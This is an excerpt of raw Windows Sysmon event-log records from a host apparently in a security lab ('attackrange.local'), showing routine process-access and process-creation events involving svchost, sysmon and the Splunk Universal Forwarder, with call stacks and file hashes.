13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.411{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.156{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.158{59A5CD1D-8EE8-6005-DD00-00000000A301}2240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 